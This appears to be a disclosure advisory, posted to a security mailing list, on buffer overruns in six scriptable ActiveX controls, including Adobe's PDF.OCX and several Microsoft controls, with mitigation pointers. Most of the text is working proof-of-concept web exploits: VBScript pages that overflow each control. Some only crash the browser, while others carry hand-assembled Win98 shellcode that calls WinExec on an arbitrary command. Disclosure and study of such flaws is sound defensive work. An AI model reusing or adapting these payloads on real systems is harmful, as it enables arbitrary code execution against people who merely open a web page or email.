Several ActiveX Buffer Overruns

[s.hird () STUDENT QUT EDU AU (Shane Hird)]

ActiveX Buffer Overruns Advisory

Disclaimer: I'm not responsible for anything, unless it's 
good.

This advisory outlines several buffer overruns in several 
controls, and the vulnerability of ActiveX controls to 
buffer overrun attacks in general. It appears that the 
ActiveX/OLE/COM technology in general does no buffer checks 
before passing parameters to controls, leaving the checking 
up to the control in question. Hence, many poorly written 
controls are individually susceptible to buffer overrun 
attacks, independent of the environment they are controlled 
from, and other controls on the system. The following 
controls are probably just a few of the vulnerable controls 
which are in common use, including one control from a third 
party vendor (Adobe). Because these controls are marked as 
safe for scripting, they may be exploited through IE 
through a web page, E-mail, or anywhere else where 'safe' 
ActiveX controls may be scripted (ie some newsgroup readers 
and other E-mail clients)

Known Affected Controls:

Acrobat Control for ActiveX   - PDF.OCX       v1.3.188
Setupctl 1.0 Type Library     - SETUPCTL.DLL  v1, 1, 0, 6
EYEDOG OLE Control module     - EYEDOG.OCX    v1.1.1.75
MSN ActiveX Setup BBS Control - SETUPBBS.OCX  v4.71.0.10
hhopen OLE Control Module     - HHOPEN.OCX    v1, 0, 0, 1
RegWizCtrl 1.0 Type Library   - REGWIZC.DLL   v3, 0, 0, 0

Each control contains at least one method, which does 
incorrect handling of strings, and when manipulating a 
string too large, a classic buffer overrun can occur, 
allowing arbitrary code to be executed on the client.

Protection:

Microsoft has been notified of these exploits around a 
month ago, and is releasing a patch to revoke the hhopen, 
regwiz and setupctl controls, and a previous patch has been 
released for Eyedog. For the other controls, and any others 
found to be vulnerable, see Microsoft knowledge base 
article Q240797 on how to stop an ActiveX control from 
running in IE. If pain persists, disable ActiveX scripting 
altogether in IE.

How to Stop an ActiveX Control from Running in Internet 
Explorer
http://support.microsoft.com/support/kb/articles/q240/7/97.a
sp

Details:

For each exploit, we have full control of the RET address, 
knowing where to RET to in order to execute our code is 
easier for some controls than others. For the controls 
where no known fixed or referenced location of the code can 
be found, I will simply RET to ExitProcess, although it is 
still possible but more difficult to execute arbitrary 
code. For the exploits which are easy to RET to the code, I 
will demonstrate how to execute a program (CALC.EXE) using 
fixed API locations in Win98, you will need to modify these 
addresses depending on the versions in use. For the 
exploits, similar to a couple other Win exploits, a JMP ESP 
is required to get to the code. I didn't manage to find one 
in Kernel32 or IExplore, however there does appear to be 
one in Shell32 (version 4.72.3110.6) at (7FD035EB), you 
will also need to modify this address depending on your 
version. So if you get a crash at around this address, then 
it is most likely possible to run the exploit, the address 
just needs to be changed. It should be noted that arbitrary 
code may be executed, not just running a program, this is 
just an example. Also, I haven't tried posting HTML to this 
forum before, so hopefully it will turn out ok, if not, 
could the moderators please convert the HTML to plaintext 
or something.

============================================================
EYEDOG:

With this control, MSInfoLoadFile is the offending method. 
There is no easy way to RET to our code, so instead, I have 
shown how to simply RET to ExitProcess directly. This will 
cause the host to terminate.

<object classid="clsid:06A7EC63-4E21-11D0-A112-00A0C90543AA"
id="eye"></object>

<script language="vbscript"><!--

msgbox("EYEDOG OLE Control module Buffer Overrun (Local 
Version)" + Chr(10) + "Written by Shane Hird")

'Padding for the exploit
expstr 
= "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA"

'RET address (ExitProcess, BFF8D4CA)
expstr = expstr + Chr(202) + Chr(212) + Chr(248) + Chr(191)

'Call exploitable method (MSInfoLoadFile)
eye.MSInfoLoadFile(expstr)

--></script>

============================================================
HHOPEN:

This control is a little more difficult to exploit, as the 
RET address is in the middle of the string, and once again 
there is no easy way to RET to our code, so I have RET'd to 
ExitProcess directly instead. In this case, OpenHelp is the 
vulnerable method, and the exploit is possible when the 
method is called with a valid help file, and a long Help 
Section.

<object
   classid="clsid:130D7743-5F5A-11D1-B676-00A0C9697233"
 id="hhopen"></OBJECT>

<script language="vbscript"><!--

msgbox("hhopen OLE Control Module Buffer Overrun" + Chr(10) 
+ "Written By Shane Hird")

expstr="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

'Where the RET address appears to be, RET to ExitProcess 
(BFF8D4CA)
expstr = expstr + Chr(202) + Chr(212) + Chr(248) + Chr(191)

'Extra padding to trigger the overrun
expstr = expstr 
+ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAA"

'Call exploitable method, note the valid help file
hhopen.OpenHelp "Winhlp32.hlp", expstr

--></script>

============================================================
SETUPBBS:

When this control is initialised, it will display a prompt 
notifying the user that the control is capable of modifying 
Mail and News configuration etc and asks the user whether 
he/she wishes the control to proceed. This control is 
exploitable through two different methods, vAddNewsServer 
and bIsNewsServerConfigured. I have simply RET'd to 
ExitProcess with this exploit, although there are other 
possibilities.

<object
   classid="clsid:8F0F5093-0A70-11D0-BCA9-00C04FD85AA6"
 id="setupbbs"></OBJECT>

<script language="vbscript"><!--

msgbox("MSN Setup BBS Buffer Overrun" + Chr(10) + "Written 
by Shane Hird")

expstr="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

'RET address (ExitProcess BFF8D4CA)
expstr = expstr + Chr(202) + Chr(212) + Chr(248) + Chr(191)

'This buffer overrun can be triggered by either method.
'setupbbs.vAddNewsServer expstr, true
setupbbs.bIsNewsServerConfigured expstr

--></script>

============================================================
PDF

This control from Adobe Acrobat, can be exploited through 
the setview method, and because ESP points to the address 
after the RET address, we can place arbitrary code at this 
point and JMP to it by RET'ing to a JMP ESP, in this case, 
one found in Shell32. The code simply executes CALC.EXE 
then calls ExitProcess to terminate the host without it 
crashing. I have attempted to notify Adobe of the issue, 
however they don't appear to have any form of direct 
secure@ address.

<object classid="clsid:CA8A9780-280D-11CF-A24D-444553540000"
id="pdf"></object>

<script language="VBscript"><!--

msgbox("Adobe Acrobat OCX Buffer Overrun" + Chr(10) 
+ "Written by Shane Hird")

expstr 
= "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAA" 

expstr = expstr + Chr(235)      'Address in SHELL32, Win98 
(7FD035EB) of JMP ESP
expstr = expstr + Chr(53)       'You may need to use a 
different address
expstr = expstr + Chr(208)
expstr = expstr + Chr(127)

'Stack is slightly trashed, but NOPs fix it up ok
expstr = expstr + Chr(144) + Chr(144) + Chr(144) + Chr(144) 
+ Chr(144)

'MOV EDI, ESP
expstr = expstr + Chr(139) + Chr(252)

'ADD EDI, 19 (Size of code)
expstr = expstr + Chr(131) + Chr(199) + Chr(25)

'PUSH EAX (Window Style EAX = 1)
expstr = expstr + Chr(80)

'PUSH EDI (Address of command line)
expstr = expstr + Chr(87)

'MOV EDX, BFFA0960 (WinExec, Win98)
expstr = expstr + Chr(186) + Chr(96) + Chr(9) + Chr(250) + 
Chr(191)

'CALL EDX
expstr = expstr + Chr(255) + Chr(210)

'XOR EAX, EAX
expstr = expstr + Chr(51) + Chr(192)

'PUSH EAX
expstr = expstr + Chr(80)

'MOV EDX, BFF8D4CA (ExitProcess, Win98)
expstr = expstr + Chr(186) + Chr(202) + Chr(212) + Chr(248) 
+ Chr(191)

'CALL EDX
expstr = expstr + Chr(255) + Chr(210)

'Replace with any command + 0 (automatically appended)
expstr = expstr + "CALC.EXE"

'Call exploitable method
pdf.setview(expstr)

--></script>

============================================================
SETUPCTL

Apparently a control that was once used for the IE update 
web site which is no longer in use, although it should 
still exist on a lot of systems. With this exploit, similar 
to the PDF exploit, ESP points to our code so we simply RET 
to the same JMP ESP in Shell32. Also, this exploit differs 
in that we set a property first (DistUnit) with the long 
string, then call the method (InstallNow). Again, I have 
simply demonstrated how to execute CALC.EXE, though any 
code can be executed.

<object classid="clsid:F72A7B0E-0DD8-11D1-BD6E-
00AA00B92AF1" id = "setupctl">
</object>

<script language="vbscript"><!--

msgbox("Setupctl 1.0 Type Library Buffer Overrun" + Chr(10) 
+ "Written by Shane Hird")

expstr="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAA"

expstr = expstr + Chr(235)      'Address in SHELL32, Win98 
(7FD035EB) of JMP ESP
expstr = expstr + Chr(53)       'You may need to use a 
different address
expstr = expstr + Chr(208)
expstr = expstr + Chr(127)

'NOP for debugging purposes
expstr = expstr + Chr(144)

'MOV EDI, ESP
expstr = expstr + Chr(139) + Chr(252)

'ADD EDI, 19h (Size of code)
expstr = expstr + Chr(131) + Chr(199) + Chr(25)

'PUSH EAX (Window Style EAX = 41414141)
expstr = expstr + Chr(80)

'PUSH EDI (Address of command line)
expstr = expstr + Chr(87)

'MOV EDX, BFFA0960 (WinExec, Win98)
expstr = expstr + Chr(186) + Chr(96) + Chr(9) + Chr(250) + 
Chr(191)

'CALL EDX
expstr = expstr + Chr(255) + Chr(210)

'XOR EAX, EAX
expstr = expstr + Chr(51) + Chr(192)

'PUSH EAX
expstr = expstr + Chr(80)

'MOV EDX, BFF8D4CA (ExitProcess, Win98)
expstr = expstr + Chr(186) + Chr(202) + Chr(212) + Chr(248) 
+ Chr(191)

'CALL EDX
expstr = expstr + Chr(255) + Chr(210)

'Replace with any command + 0 (automatically appended)
expstr = expstr + "CALC.EXE"

'Run exploit
setupctl.DistUnit = expstr
setupctl.InstallNow

--></script>

============================================================
REGWIZC

The Registration Wizard control used by Microsoft to 
register MS products also contains a buffer overrun in 
the 'InvokeRegWizard' method. When called with a long 
string, pre-pended with '/i', we can gain control of the 
RET address and exploit the control in a similar manner as 
the PDF control. This exploit will cause a 'Regwiz.log' 
file to be created in the temporary directory, and once 
again will execute CALC.EXE and terminate the host.

<object classid="clsid:50E5E3D1-C07E-11D0-B9FD-
00A0249F6B00" id="RegWizObj">
</object>

<script language="VbScript" ><!--

msgbox("Registration Wizard Buffer Overrun" + Chr(10) 
+ "Written by Shane Hird")

expstr = "/i 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

'We overflowed to the RET point of the stack
'No NULL's allowed so ret to <JMP ESP> in Shell32

expstr = expstr & Chr(235)      'Address in SHELL32, Win98 
(7FD035EB) of JMP ESP
expstr = expstr & Chr(53)       'You may need to use a 
different address
expstr = expstr & Chr(208)
expstr = expstr & Chr(127)

'NOP for debugging purposes
expstr = expstr + Chr(144)

'MOV EDI, ESP
expstr = expstr + Chr(139) + Chr(252)

'ADD EDI, 19 (Size of code)
expstr = expstr + Chr(131) + Chr(199) + Chr(25)

'PUSH EAX (Window Style EAX = 41414141)
expstr = expstr + Chr(80)

'PUSH EDI (Address of command line)
expstr = expstr + Chr(87)

'MOV EDX, BFFA0960 (WinExec, Win98)
expstr = expstr + Chr(186) + Chr(96) + Chr(9) + Chr(250) + 
Chr(191)

'CALL EDX
expstr = expstr + Chr(255) + Chr(210)

'XOR EAX, EAX
expstr = expstr + Chr(51) + Chr(192)

'PUSH EAX
expstr = expstr + Chr(80)

'MOV EDX, BFF8D4CA (ExitProcess, Win98)
expstr = expstr + Chr(186) + Chr(202) + Chr(212) + Chr(248) 
+ Chr(191)

'CALL EDX
expstr = expstr + Chr(255) + Chr(210)

'Replace with any command + 0 (automatically appended)
expstr = expstr + "CALC.EXE"

RegWizObj.InvokeRegWizard(expstr)

--></script>

============================================================

Sorry for the length of this advisory, but as there are 
several exploits, and probably many more, it was necessary. 
It should be noted, that not only MS ActiveX controls are 
susceptible, but also many other vendors controls. I cannot 
possibly go through all the controls which are available to 
the public, but the controls which are installed by default 
on most systems are obviously the most serious.

-Shane Hird <s.hird () student qut edu au>
 First year IT student at QUT, Brisbane, Australia. 
Sponsors?